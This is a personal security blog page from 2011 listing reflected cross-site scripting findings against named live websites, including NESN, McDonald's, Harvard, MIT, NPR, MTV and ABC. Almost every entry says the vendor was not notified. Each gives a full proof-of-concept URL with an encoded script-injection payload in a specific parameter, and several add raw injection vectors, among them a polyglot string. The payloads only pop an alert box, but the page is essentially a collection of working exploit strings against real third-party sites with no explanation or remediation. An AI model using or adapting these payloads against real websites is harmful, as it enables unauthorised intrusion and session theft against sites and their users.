This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
26
Apr 11

NESN

Date: Apr-26-2011
Vendor Notified: No
Proof of Concept:
http://stats.nesn.com/nhl/teamstats.asp?teamno=&type=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

10
Apr 11

The Technical College Reykjavik

Date: Apr-10-2011
Vendor Notified: No
Proof of Concept:
http://en.tskoli.is/leit?SearchFor=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

25
Mar 11

MSNBC

Date: Mar-25-2011
Vendor Notified: No
Proof of Concept:
http://scores.nbcsports.msnbc.com/fb/teamstats.asp?type=%22%3E%3Cscript%3Ealert(%270%27);%3C/script%3E

21
Mar 11

UN Multimedia

Date: Mar-21-2011
Vendor Notified: No
Proof of Concept:
http://www.unmultimedia.org/photo/detail.jsp?id=403/403478&key=2&query=%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

Vectors:

  • <script type="text/javascript"> sendRequest('2', '2', '</script>"><script>alert(0)</script>', '', ''); </script>
07
Mar 11

McDonald’s

Date: Mar-07-2011
Vendor Notified: No
Proof of Concept:
http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%27%3E%3Cscript%3Ealert(%270%27)%3C/script%3E

05
Mar 11

Harvard

Date: Mar-05-2011
Vendor Notified: No
Proof of Concept:
http://college.harvard.edu/icb/icb.do?keyword=k61161&pageid=icb.page316368&pageContentId=icb.pagecontent828781&view=view.do&state=maximize&viewParam_q=%3Cscript%3Ealert(%270%27);%3C/script%3E

05
Mar 11

MIT

Date: Mar-05-2011
Vendor Notified: No
Proof of Concept:
http://web.mit.edu/bin/cgicso?query=%22;//--%3E%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E

03
Mar 11

MTV

Date: Mar-03-2011
Vendor Notified: No
Proof of Concept:
http://www.mtv.com/search/?q=%3C/script%3E%3Cscript%3Ealert(%270%27);%3C/script%3E

 

Vectors:

  • </script><script>alert('0');</script>
01
Mar 11

NPR

Date: Mar-01-2011
Vendor Notified: Yes
Proof of Concept:
http://www.npr.org/search/index.php?searchinput=alert(0);%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert(0);%3C/script%3E

 

Vectors:

  • alert(0);</script>">'><script>alert(0);</script>
  • ';alert(0)//\';//";//\";alert(0)//--></script>">'><script>alert(0)</script>
01
Mar 11

ABC

Date: Mar-01-2011
Vendor Notified: No
Proof of Concept:
http://abc.go.com/search?search=%22%3E%3Cscript%3Ealert(%270%27);%3C/script%3E

 

Vectors:

  • "><script>alert('0');</script>
  • <script>alert('0');</script>
« Older Entries
Newer Entries »

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab